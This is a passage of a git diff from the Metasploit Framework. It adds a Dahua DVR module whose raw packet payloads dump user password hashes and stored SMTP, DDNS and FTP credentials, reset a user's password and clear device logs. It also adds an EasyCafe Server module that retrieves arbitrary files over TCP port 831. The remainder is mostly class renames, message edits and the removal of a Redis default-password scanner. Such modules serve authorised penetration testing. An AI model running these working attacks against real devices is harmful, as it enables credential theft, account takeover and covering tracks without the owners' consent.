\ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" \ + "\xa8\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Users Groups of the DVR + GROUPS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Users and their hashes from the DVR + USERS = "\xa6\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to grab the Serial Number of the DVR + SN = "\xa4\x00\x00\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + # Payload to clear the logs of the DVR + CLEAR_LOGS1 = "\x60\x00\x00\x00\x00\x00\x00\x00\x90\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + CLEAR_LOGS2 = "\x60\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + + def setup + @password = datastore['PASSWORD'] + @password ||= Rex::Text.rand_text_alpha(6) + end + + def grab_version + connect + sock.put(VERSION) + data = sock.get_once + return unless data =~ /[\x00]{8,}([[:print:]]+)/ + ver = Regexp.last_match[1] + print_good("#{peer} -- version: #{ver}") + end + + def grab_serial + connect + sock.put(SN) + data = sock.get_once + return unless data =~ /[\x00]{8,}([[:print:]]+)/ + serial = Regexp.last_match[1] + print_good("#{peer} -- serial number: #{serial}") + end + + def grab_email + connect + sock.put(EMAIL) + return unless (response = sock.get_once) + data = response.split('&&') + print_good("#{peer} -- Email Settings:") + return unless data.first =~ /([\x00]{8,}(?=.{1,255}$)[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?(?:\.[0-9A-Z](?:(?:[0-9A-Z]|-){0,61}[0-9A-Z])?)*\.?+:\d+)/i + if mailhost = Regexp.last_match[1].split(':') + print_status("#{peer} -- Server: #{mailhost[0]}") unless mailhost[0].blank? + print_status("#{peer} -- Server Port: #{mailhost[1]}") unless mailhost[1].blank? + print_status("#{peer} -- Destination Email: #{data[1]}") unless data[1].blank? + mailserver = "#{mailhost[0]}" + mailport = "#{mailhost[1]}" + muser = "#{data[5]}" + mpass = "#{data[6]}" + end + return if muser.blank? && mpass.blank? + print_good(" SMTP User: #{data[5]}") + print_good(" SMTP Password: #{data[6]}") + return unless mailserver.blank? && mailport.blank? && muser.blank? && mpass.blank? + report_email_cred(mailserver, mailport, muser, mpass) + end + + def grab_ddns + connect + sock.put(DDNS) + return unless (response = sock.get_once) + data = response.split(/&&[0-1]&&/) + ddns_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua DDNS Settings', + 'Indent' => 1, + 'Columns' => ['Peer', 'DDNS Service', 'DDNS Server', 'DDNS Port', 'Domain', 'Username', 'Password'] + ) + data.each_with_index do |val, index| + next if index == 0 + val = val.split("&&") + ddns_service = val[0] + ddns_server = val[1] + ddns_port = val[2] + ddns_domain = val[3] + ddns_user = val[4] + ddns_pass = val[5] + ddns_table << [ peer, ddns_service, ddns_server, ddns_port, ddns_domain, ddns_user, ddns_pass ] + unless ddns_server.blank? && ddns_port.blank? && ddns_user.blank? && ddns_pass.blank? + if datastore['VERBOSE'] + ddns_table.print + end + report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + end + end + end + + def grab_nas + connect + sock.put(NAS) + return unless (data = sock.get_once) + print_good("#{peer} -- NAS Settings:") + server = '' + port = '' + if data =~ /[\x00]{8,}[\x01][\x00]{3,3}([\x0-9a-f]{4,4})([\x0-9a-f]{2,2})/ + server = Regexp.last_match[1].unpack('C*').join('.') + port = Regexp.last_match[2].unpack('S') + end + if /[\x00]{16,}(?[[:print:]]+)[\x00]{16,}(?[[:print:]]+)/ =~ data + ftpuser.strip! + ftppass.strip! + unless ftpuser.blank? || ftppass.blank? + print_good("#{peer} -- NAS Server: #{server}") + print_good("#{peer} -- NAS Port: #{port}") + print_good("#{peer} -- FTP User: #{ftpuser}") + print_good("#{peer} -- FTP Pass: #{ftppass}") + report_creds( + host: server, + port: port, + user: ftpuser, + pass: ftppass, + type: "FTP", + active: true) + end + end + end + + def grab_channels + connect + sock.put(CHANNELS) + data = sock.get_once.split('&&') + channels_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua Camera Channels', + 'Indent' => 1, + 'Columns' => ['ID', 'Peer', 'Channels'] + ) + return unless data.length > 1 + data.each_with_index do |val, index| + number = index.to_s + channels = val[/([[:print:]]+)/] + channels_table << [ number, peer, channels ] + end + channels_table.print + end + + def grab_users + connect + sock.put(USERS) + return unless (response = sock.get_once) + data = response.split('&&') + usercount = 0 + users_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua Users Hashes and Rights', + 'Indent' => 1, + 'Columns' => ['Peer', 'Username', 'Password Hash', 'Groups', 'Permissions', 'Description'] + ) + data.each do |val| + usercount += 1 + user, md5hash, groups, rights, name = val.match(/^.*:(.*):(.*):(.*):(.*):(.*):(.*)$/).captures + users_table << [ peer, user, md5hash, groups, rights, name] + # Write the dahua hash to the database + hash = "#{rhost} #{user}:$dahua$#{md5hash}" + report_hash(rhost, rport, user, hash) + # Write the vulnerability to the database + report_vuln( + host: rhost, + port: rport, + proto: 'tcp', + sname: 'dvr', + name: 'Dahua Authentication Password Hash Exposure', + info: "Obtained password hash for user #{user}: #{md5hash}", + refs: references + ) + end + users_table.print + end + + def grab_groups + connect + sock.put(GROUPS) + return unless (response = sock.get_once) + data = response.split('&&') + groups_table = Rex::Ui::Text::Table.new( + 'Header' => 'Dahua groups', + 'Indent' => 1, + 'Columns' => ['ID', 'Peer', 'Group'] + ) + data.each do |val| + number = "#{val[/(([\d]+))/]}" + groups = "#{val[/(([a-z]+))/]}" + groups_table << [ number, peer, groups ] + end + groups_table.print + end + + def reset_user + connect + userstring = datastore['USERNAME'] + ":Intel:" + @password + ":" + @password + u1 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u2 = "\xa4\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + u3 = "\xa6\x00\x00\x00#{userstring.length.chr}\x00\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00" \ + "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" + userstring + sock.put(u1) + sock.put(u2) + sock.put(u3) + sock.get_once + sock.put(u1) + return unless sock.get_once + print_good("#{peer} -- user #{datastore['USERNAME']}'s password reset to #{@password}") + end + + def clear_logs + connect + sock.put(CLEAR_LOGS1) + sock.put(CLEAR_LOGS2) + print_good("#{peer} -- logs cleared") + end + + def peer + "#{rhost}:#{rport}" + end + + def run_host(_ip) + begin + connect + sock.put(U1) + data = sock.recv(8) + disconnect + return unless data == DVR_RESP + print_good("#{peer} -- Dahua-based DVR found") + report_service(host: rhost, port: rport, sname: 'dvr', info: "Dahua-based DVR") + + case action.name.upcase + when 'CHANNEL' + grab_channels + when 'DDNS' + grab_ddns + when 'EMAIL' + grab_email + when 'GROUP' + grab_groups + when 'NAS' + grab_nas + when 'RESET' + reset_user + when 'SERIAL' + grab_serial + when 'USER' + grab_users + when 'VERSION' + grab_version + end + + clear_logs if datastore['CLEAR_LOGS'] + ensure + disconnect + end + end + + def report_hash(rhost, rport, user, hash) + service_data = { + address: rhost, + port: rport, + service_name: 'dahua_dvr', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + origin_type: :service, + private_data: hash, + private_type: :nonreplayable_hash, + jtr_format: 'dahua_hash', + username: user + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end + + def report_ddns_cred(ddns_server, ddns_port, ddns_user, ddns_pass) + service_data = { + address: ddns_server, + port: ddns_port, + service_name: 'ddns settings', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + origin_type: :service, + private_data: ddns_pass, + private_type: :password, + username: ddns_user + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end + + def report_email_cred(mailserver, mailport, muser, mpass) + service_data = { + address: mailserver, + port: mailport, + service_name: 'email settings', + protocol: 'tcp', + workspace_id: myworkspace_id + } + + credential_data = { + module_fullname: fullname, + origin_type: :service, + private_data: mpass, + private_type: :password, + username: muser + }.merge(service_data) + + login_data = { + core: create_credential(credential_data), + status: Metasploit::Model::Login::Status::UNTRIED + }.merge(service_data) + + create_credential_login(login_data) + end +end diff --git a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb index c497a8ff3d..4d5b3fa724 100644 --- a/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb +++ b/modules/auxiliary/scanner/misc/dvr_config_disclosure.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb new file mode 100644 index 0000000000..b16a4cfc06 --- /dev/null +++ b/modules/auxiliary/scanner/misc/easycafe_server_fileaccess.rb @@ -0,0 +1,97 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'EasyCafe Server Remote File Access', + 'Description' => %q{ + This module exploits a file retrieval vulnerability in + EasyCafe Server. The vulnerability can be triggered by + sending a specially crafted packet (opcode 0x43) to the + 831/TCP port. + This module has been successfully tested on EasyCafe Server + version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 + and Windows 7 SP1. + Note that the server will throw a popup messagebox if the + specified file does not exist. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'R-73eN', # Vulnerability Discovery + 'Brendan Coles ' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '39102' ] + ] + )) + + register_options( + [ + Opt::RPORT(831), + OptString.new('FILEPATH', [true, 'The path of the file to download', 'C:\\WINDOWS\\system32\\drivers\\etc\\hosts']) + ], self.class) + end + + def get_file + res = sock.get_once + unless res + print_error("Unable to retrieve file due to a timeout.") + return + end + + unless res.length == 261 + print_error("Received a response of an invalid size.") + return + end + + file_size = res.unpack('@256V')[0] + contents = '' + while contents.length < file_size + contents << sock.get_once + end + + print_status("File retrieved successfully (#{contents.length} bytes)!") + contents + end + + def run_host(ip) + file_path = datastore['FILEPATH'] + if file_path.length > 67 + print_error("File path is longer than 67 characters. Try using MS-DOS 8.3 short file names.") + return + end + + packet = "\x43" + packet << file_path + packet << "\x00" * (255 - file_path.length) + packet << "\x01\x00\x00\x00\x01" + + vprint_status("Sending request (#{packet.length} bytes)") + connect + sock.put(packet) + + contents = get_file + disconnect + return if contents.nil? + + path = store_loot( + 'easycafe_server', + 'application/octet-stream', + ip, + contents, + File.basename(file_path) + ) + print_status("File saved in: #{path}") + end +end diff --git a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb index e50e477f5e..c0a7fc5418 100644 --- a/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb +++ b/modules/auxiliary/scanner/misc/ib_service_mgr_info.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index ead12ac27a..7601687f18 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/java/serialization' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Java::Rmi::Client include Msf::Auxiliary::Scanner @@ -35,19 +35,19 @@ class Metasploit3 < Msf::Auxiliary end def run_host(target_host) - vprint_status("#{peer} - Sending RMI Header...") + vprint_status("Sending RMI Header...") connect send_header ack = recv_protocol_ack if ack.nil? - print_error("#{peer} - Failed to negotiate RMI protocol") + print_error("Failed to negotiate RMI protocol") disconnect return end # Determine if the instance allows remote class loading - vprint_status("#{peer} - Sending RMI Call...") + vprint_status("Sending RMI Call...") jar = Rex::Text.rand_text_alpha(rand(8)+1) + '.jar' jar_url = "file:RMIClassLoaderSecurityTest/" + jar @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary return_value = recv_return if return_value.nil? - print_error("#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected") + print_error("Failed to send RMI Call, anyway JAVA RMI Endpoint detected") report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "") return end diff --git a/modules/auxiliary/scanner/misc/oki_scanner.rb b/modules/auxiliary/scanner/misc/oki_scanner.rb index 44f949da95..8eb2ee4019 100644 --- a/modules/auxiliary/scanner/misc/oki_scanner.rb +++ b/modules/auxiliary/scanner/misc/oki_scanner.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb index 39a58fb004..110244aa82 100644 --- a/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb +++ b/modules/auxiliary/scanner/misc/poisonivy_control_scanner.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb index 9f0c275fd7..8c43197c72 100644 --- a/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb +++ b/modules/auxiliary/scanner/misc/raysharp_dvr_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/redis_server.rb b/modules/auxiliary/scanner/misc/redis_server.rb deleted file mode 100644 index 1dd600d8eb..0000000000 --- a/modules/auxiliary/scanner/misc/redis_server.rb +++ /dev/null @@ -1,84 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Auxiliary - - include Msf::Module::Deprecated - deprecated(Date.new(2016, 3, 5), 'auxiliary/scanner/redis/redis_server') - include Msf::Auxiliary::Report - include Msf::Auxiliary::Scanner - include Msf::Exploit::Remote::Tcp - - def initialize(info={}) - super(update_info(info, - 'Name' => 'Redis-server Scanner', - 'Description' => %q{ - This module scans for Redis server. By default Redis has no auth. If auth - (password only) is used, it is then possible to execute a brute force attack on - the server. This scanner will find open or password protected Redis servers and - report back the server information - }, - 'Author' => [ 'iallison ' ], - 'License' => MSF_LICENSE - )) - - register_options( - [ - Opt::RPORT(6379), - ], self.class) - - deregister_options('RHOST') - end - - def run_host(ip) - print_status("Scanning IP: #{ip.to_s}") - begin - pkt = "PING\r\n" - connect - sock.put(pkt) - res = sock.get_once - - if res =~ /PONG/ - info = "INFO\r\n" - sock.put(info) - data = sock.get_once - print_status("Redis Server Information #{data}") - data_sanitized = data.to_s - elsif res =~ /ERR/ - auth = "AUTH foobared\r\n" - sock.put(auth) - data = sock.get_once - print_status("Response: #{data.chop}") - if data =~ /\-ERR\sinvalid\spassword/ - print_status("Redis server is using AUTH") - else - print_good("Redis server is using the default password of foobared") - report_note( - :host => rhost, - :port => rport, - :type => 'password', - :data => 'foobared' - ) - end - else - print_error "#{ip} does not have a Redis server" - end - - report_service( - :host => rhost, - :port => rport, - :name => "redis server", - :info => data_sanitized - ) - - disconnect - - rescue ::Exception => e - print_error "Unable to connect: #{e.to_s}" - end - end -end diff --git a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb index e77aaa2c1e..b364568cd3 100644 --- a/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb +++ b/modules/auxiliary/scanner/misc/rosewill_rxs3211_passwords.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb index d52870235d..8b9ecfc9cb 100644 --- a/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb +++ b/modules/auxiliary/scanner/misc/sercomm_backdoor_scanner.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 8c7fa985c9..9e75d30953 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::SunRPC include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) peer = "#{ip}:#{rport}" - vprint_status "#{peer} - SunRPC - Enumerating programs" + vprint_status "SunRPC - Enumerating programs" begin program = 100000 @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end sunrpc_destroy return if maps.empty? - vprint_good("#{peer} - Found #{maps.size} programs available") + vprint_good("Found #{maps.size} programs available") table = Rex::Ui::Text::Table.new( 'Header' => "SunRPC Programs for #{ip}", diff --git a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb index 3fbd8b36c1..25bf30368e 100644 --- a/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb +++ b/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mongodb/mongodb_login.rb b/modules/auxiliary/scanner/mongodb/mongodb_login.rb index e8091b4b1b..5240dc8767 100644 --- a/modules/auxiliary/scanner/mongodb/mongodb_login.rb +++ b/modules/auxiliary/scanner/mongodb/mongodb_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb index 525441c1c4..711fe24d98 100644 --- a/modules/auxiliary/scanner/motorola/timbuktu_udp.rb +++ b/modules/auxiliary/scanner/motorola/timbuktu_udp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/msf/msf_rpc_login.rb b/modules/auxiliary/scanner/msf/msf_rpc_login.rb index 1f3100ec96..a6288c472b 100644 --- a/modules/auxiliary/scanner/msf/msf_rpc_login.rb +++ b/modules/auxiliary/scanner/msf/msf_rpc_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/msf/msf_web_login.rb b/modules/auxiliary/scanner/msf/msf_web_login.rb index 28cacb64af..485c406829 100644 --- a/modules/auxiliary/scanner/msf/msf_web_login.rb +++ b/modules/auxiliary/scanner/msf/msf_web_login.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb index 5180dc687f..dd9d13985d 100644 --- a/modules/auxiliary/scanner/mssql/mssql_hashdump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_hashdump.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report @@ -30,7 +30,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/mssql/mssql_login.rb b/modules/auxiliary/scanner/mssql/mssql_login.rb index 6c07f9f3b8..96ff2394cb 100644 --- a/modules/auxiliary/scanner/mssql/mssql_login.rb +++ b/modules/auxiliary/scanner/mssql/mssql_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mssql' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mssql/mssql_ping.rb b/modules/auxiliary/scanner/mssql/mssql_ping.rb index 12078e523a..a15b4936ba 100644 --- a/modules/auxiliary/scanner/mssql/mssql_ping.rb +++ b/modules/auxiliary/scanner/mssql/mssql_ping.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb index 628a8fdb86..d6145d54e0 100644 --- a/modules/auxiliary/scanner/mssql/mssql_schemadump.rb +++ b/modules/auxiliary/scanner/mssql/mssql_schemadump.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MSSQL include Msf::Auxiliary::Report @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - if (not mssql_login_datastore) + if !mssql_login_datastore print_error("#{rhost}:#{rport} - Invalid SQL Server credentials") return end diff --git a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb index bcb1234c20..03ae86a4bb 100644 --- a/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 7219f8eab1..651777c43e 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Login...") + vprint_status("Login...") if (not mysql_login_datastore) return @@ -53,10 +53,10 @@ class Metasploit3 < Msf::Auxiliary begin mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary table_exists = (res.size == 1) if !table_exists - vprint_status("#{peer} - Table doesn't exist so creating it") + vprint_status("Table doesn't exist so creating it") mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary file.close if !table_exists - vprint_status("#{peer} - Cleaning up the temp table") + vprint_status("Cleaning up the temp table") mysql_query("DROP TABLE " + datastore['TABLE_NAME']) end end @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary begin res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable - print_good("#{peer} - #{dir} is a directory and exists") + print_good("#{dir} is a directory and exists") report_note( :host => rhost, :type => "filesystem.dir", @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::DataTooLong, ::RbMysql::TruncatedWrongValueForField - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", @@ -104,15 +104,15 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::ServerError - vprint_warning("#{peer} - #{dir} does not exist") + vprint_warning("#{dir} does not exist") rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return else - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", diff --git a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb index ce7c378756..001db59de4 100644 --- a/modules/auxiliary/scanner/mysql/mysql_hashdump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_hashdump.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_login.rb b/modules/auxiliary/scanner/mysql/mysql_login.rb index 97658016c6..96df43e074 100644 --- a/modules/auxiliary/scanner/mysql/mysql_login.rb +++ b/modules/auxiliary/scanner/mysql/mysql_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/mysql' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb index ede601b57e..18553d0c99 100644 --- a/modules/auxiliary/scanner/mysql/mysql_schemadump.rb +++ b/modules/auxiliary/scanner/mysql/mysql_schemadump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'yaml' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::MYSQL include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/mysql/mysql_version.rb b/modules/auxiliary/scanner/mysql/mysql_version.rb index bde7d5c2b7..39d28e1a01 100644 --- a/modules/auxiliary/scanner/mysql/mysql_version.rb +++ b/modules/auxiliary/scanner/mysql/mysql_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Auxiliary +class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb 